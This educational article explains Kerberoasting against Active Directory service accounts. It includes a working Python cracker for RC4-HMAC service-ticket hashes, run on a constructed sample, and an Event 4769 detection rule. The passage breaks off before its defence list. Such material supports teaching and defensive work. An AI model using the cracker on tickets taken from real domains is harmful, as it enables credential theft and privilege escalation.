Attackers are constantly finding new ways into systems and data, and today's interconnected business networks give them more to work with. One particularly effective technique is known as "Kerberoasting." It abuses a design property of the Kerberos authentication protocol rather than a software bug, and in Active Directory environments it is a reliable path to serious privilege escalation. Organizations, security practitioners, and IT staff who want to protect their domains from this growing threat need to understand how it works.

The Basics of Kerberos Authentication

Kerberos is a widely used network authentication protocol that relies on symmetric-key cryptography to verify the identity of users and services on a network. It was developed at MIT in the 1980s to authenticate users securely across untrusted networks, including the Internet. Microsoft adopted Kerberos as the default authentication protocol for Windows Active Directory (AD), which makes it the dominant authentication mechanism in enterprise networks today. When a user authenticates, the Key Distribution Center (KDC) on a domain controller issues a Ticket Granting Ticket (TGT). The user then presents that TGT to request service tickets for individual resources such as email systems, file servers, and databases. Each service is identified by a Service Principal Name (SPN) registered on the account that runs it, and the service ticket is encrypted with a key derived from that account's password (for RC4-HMAC, the account's NT hash itself) so that only the service can read it. The KDC does not check whether the requesting user is actually allowed to use the service; that authorization decision is made by the service after it decrypts the ticket.

The Rise of Kerberoasting

Kerberoasting abuses this service-ticket issuance. It targets accounts that have an SPN registered, most usefully user accounts (rather than computer accounts) that run services such as database servers, email servers, or enterprise applications, because those accounts are often highly privileged and, unlike computer accounts, carry passwords that a human chose and rarely rotates. Any authenticated domain user, even a low-privileged one, can ask the KDC on a domain controller for a service ticket for any SPN. Because the ticket is encrypted with a key derived from the service account's password, the attacker can take the ticket offline and test candidate passwords against it with a dictionary or brute-force attack; no further interaction with the domain is needed. If the password is recovered, the attacker can authenticate as the service account, reach the systems it has access to, and often escalate further.
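The offline cracking step described above, as an added example that is not code from the original article: a small cracker for RC4-HMAC (etype 23) service tickets in the $krb5tgs$23$ text format that hashcat mode 13100 consumes. It implements the RFC 4757 RC4-HMAC key derivation (NT hash, K1, K3) and checks the HMAC-MD5 over the decrypted ticket, which is exactly what tells a cracker that a password candidate is right. No domain is contacted: the sample "ticket", the account name svc_sql, the realm CORP.LOCAL, the SPN, the password and the wordlist are all constructed for this example, with the ticket produced locally by encrypting a placeholder with a known weak password.

```python
# Added example, not code from the original article: offline cracker for
# RC4-HMAC (etype 23) service tickets in hashcat's $krb5tgs$23$ (mode 13100) format.
# The sample ticket below is constructed locally; no domain is contacted.
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
KEY_USAGE_TGS_REP_TICKET = 2  # RFC 4120 key usage number for a ticket's enc-part

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = list(state)
        for fn, order, shifts, const in rounds:
            for i, k in enumerate(order):
                j = -i % 4  # the updated register rotates a, d, c, b
                r[j] = rotl((r[j] + fn(r[(j + 1) % 4], r[(j + 2) % 4], r[(j + 3) % 4])
                             + x[k] + const) & MASK, shifts[i % 4])
        state = [(s + v) & MASK for s, v in zip(state, r)]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    """The RC4-HMAC long-term key is the NT hash: MD4 over UTF-16LE(password)."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for b in data:  # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()

def rc4_hmac_encrypt(key, usage, plaintext, confounder=None):
    """RFC 4757 encrypt(): checksum (16 bytes) || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    conf = os.urandom(8) if confounder is None else confounder
    checksum = hmac_md5(k1, conf + plaintext)  # K2 == K1 for etype 23
    return checksum + rc4(hmac_md5(k1, checksum), conf + plaintext)

def rc4_hmac_decrypt(key, usage, edata):
    """Inverse of the above; returns the plaintext, or None if the checksum fails."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    checksum, body = edata[:16], edata[16:]
    plain = rc4(hmac_md5(k1, checksum), body)
    if not hmac.compare_digest(hmac_md5(k1, plain), checksum):
        return None
    return plain[8:]  # strip the confounder

def to_hashcat_13100(user, realm, spn, edata):
    """hashcat mode 13100 line: $krb5tgs$23$*user$realm$spn*$checksum$edata."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"

def crack_krb5tgs23(line, wordlist):
    """Offline dictionary attack: first candidate whose NT hash verifies the ticket."""
    if not line.startswith("$krb5tgs$23$"):
        raise ValueError("only RC4-HMAC (etype 23) tickets are handled here")
    parts = line.split("$")
    edata = bytes.fromhex(parts[-2]) + bytes.fromhex(parts[-1])
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), KEY_USAGE_TGS_REP_TICKET, edata) is not None:
            return candidate
    return None

# Constructed sample: a real enc-part is a DER-encoded EncTicketPart; a placeholder
# is enough to exercise the cipher and the crack loop. Account, SPN and password are invented.
SERVICE_PASSWORD = "Summer2023!"
FAKE_ENC_TICKET_PART = b"\x63\x82\x01\x00" + b"EncTicketPart placeholder" * 4
SAMPLE_HASH = to_hashcat_13100(
    "svc_sql", "CORP.LOCAL", "MSSQLSvc/db01.corp.local:1433",
    rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), KEY_USAGE_TGS_REP_TICKET,
                     FAKE_ENC_TICKET_PART, confounder=bytes(8)),  # fixed confounder: reproducible
)
WORDLIST = ["password", "Welcome1", "P@ssw0rd", "Summer2023!", "Winter2024!"]

if __name__ == "__main__":
    print(SAMPLE_HASH[:70] + "...")
    print("cracked:", crack_krb5tgs23(SAMPLE_HASH, WORDLIST))
```

The point to take from the code is that every guess costs one MD4, three HMAC-MD5s and one RC4 pass, all of which run at hundreds of millions of guesses per second on a GPU, and nothing in the loop touches the network. A ticket issued with AES (etype 17 or 18) instead uses PBKDF2 with 4096 iterations for the key derivation, which is why forcing AES on service accounts slows cracking by orders of magnitude.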

The Impact of Kerberoasting

Kerberoasting is a serious concern for businesses because it gives attackers an easy, low-noise route to higher privileges, and it appears regularly in larger campaigns, including Advanced Persistent Threat (APT) operations; MITRE ATT&CK catalogues it as technique T1558.003. Once an adversary has escalated, they can install malware, steal sensitive data, or take control of a company's entire network. The 2017 NotPetya attack is sometimes held up as an example of Kerberoasting in action, but it spread through the EternalBlue SMB exploit and credentials harvested from memory, not through Kerberoasting. What it does illustrate is the damage, measured in billions of dollars across businesses worldwide, that follows once an attacker holding stolen credentials can move laterally through corporate networks, compromise significant infrastructure, and interfere with business processes.

In a different setting, a penetration test of a major financial institution, Kerberoasting gave the security firm's testers access to critical banking applications running under service accounts. Weak passwords on those accounts were enough to get the testers into significant financial systems, which shows how effective the attack is against real environments.

Why Kerberoasting Is Effective

Kerberoasting is effective for three reasons. First, once the service ticket has been obtained, no further connection to the target is required: password guessing happens entirely offline, at whatever speed the attacker's hardware allows, and produces no failed logons or network traffic for an intrusion detection system to notice. Second, the attack relies on a design property of Kerberos rather than a bug. Any authenticated user may request a ticket for any SPN, so the KDC cannot tell a legitimate request from a roasting one, and without comprehensive security monitoring the activity is hard to discover or counter. Requesting tickets with the legacy RC4-HMAC encryption type (etype 23), which most domains still permit, makes cracking far faster than it would be with AES. Third, password management for service accounts is usually poor. Service accounts are routinely excluded from password rotation, and many carry weak, human-chosen passwords set years ago. Companies with many service accounts, each accessing different systems, find it difficult to enforce strong password policies consistently, which raises the odds that at least one account is crackable.
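The monitoring gap described above is closed on the domain controller side, where every service-ticket request is logged as Windows Security Event ID 4769 whether or not the attacker ever cracks the ticket. The following detection rule is an added example, not code from the original article: it parses constructed 4769 records and flags any account that requests RC4 (TicketEncryptionType 0x17) tickets for several distinct service accounts within a short window, the signature that bulk roasting tools leave behind. The log lines, account names (jdoe, contractor7, legacyapp), service names, threshold and window are all assumptions made for this example; the field names follow the 4769 event schema.

```python
# Added example, not code from the original article: a Kerberoasting detection
# rule over constructed Event ID 4769 records (service ticket requested).
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # legacy etype 23; AES128/AES256 tickets show as 0x11 / 0x12

# Constructed log extract: one 4769 (or 4768) record per line, key=value fields.
SAMPLE_LOG = """\
2024-05-01T09:00:01 EventID=4768 TargetUserName=jdoe@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0
2024-05-01T09:00:05 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=FS01$ TicketEncryptionType=0x12 Status=0x0
2024-05-01T09:12:00 EventID=4769 TargetUserName=contractor7@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0
2024-05-01T09:12:00 EventID=4769 TargetUserName=contractor7@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 Status=0x0
2024-05-01T09:12:01 EventID=4769 TargetUserName=contractor7@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0
2024-05-01T09:12:01 EventID=4769 TargetUserName=contractor7@CORP.LOCAL ServiceName=svc_sharepoint TicketEncryptionType=0x17 Status=0x0
2024-05-01T09:12:02 EventID=4769 TargetUserName=contractor7@CORP.LOCAL ServiceName=svc_exchange TicketEncryptionType=0x17 Status=0x0
2024-05-01T09:30:00 EventID=4769 TargetUserName=legacyapp@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0
2024-05-01T10:00:00 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x12 Status=0x0
"""

def parse_4769(text):
    """Yield (timestamp, requesting user, service name, etype, status) for each 4769 line."""
    events = []
    for line in text.splitlines():
        ts, _, rest = line.partition(" ")
        fields = dict(kv.split("=", 1) for kv in rest.split())
        if fields.get("EventID") != "4769":
            continue  # 4768 (TGT requests) and other IDs are not ticket-for-service events
        user = fields["TargetUserName"].split("@")[0]
        events.append((datetime.fromisoformat(ts), user, fields["ServiceName"],
                       fields["TicketEncryptionType"], fields["Status"]))
    return events

def detect_kerberoasting(events, threshold=4, window=timedelta(minutes=5)):
    """Return {user: sorted service names} for users that obtained RC4 tickets for at
    least `threshold` distinct user-account services inside any `window`."""
    per_user = defaultdict(list)
    for ts, user, service, etype, status in events:
        if status != "0x0" or etype != RC4_HMAC:
            continue  # only successful RC4 issuances are crackable in practice
        if service.endswith("$") or service.lower() == "krbtgt":
            continue  # computer accounts use long random auto-rotated passwords; krbtgt is the TGT
        per_user[user].append((ts, service))
    alerts = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # slide a window from each request
            spns = {svc for ts, svc in reqs[i:] if ts - start <= window}
            if len(spns) >= threshold:
                alerts[user] = sorted(spns)
                break
    return alerts

if __name__ == "__main__":
    for user, spns in detect_kerberoasting(parse_4769(SAMPLE_LOG)).items():
        print(f"possible Kerberoasting by {user}: {', '.join(spns)}")
```

The single RC4 request from legacyapp is deliberately not flagged: one old application that still negotiates RC4 is common, and a rule that fires on every 0x17 ticket drowns in noise. The burst of distinct SPNs from one account in seconds is what separates a roasting run from normal use. A decoy account with a registered SPN that no real service uses turns this into a high-fidelity alert, because any 4769 naming it is suspicious on its own.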

Defending Against Kerberoasting

Given the severity of Kerberoasting attacks, organizations must implement effective countermeasures to protect their networks. Here are some best practices that can help mitigate the risk.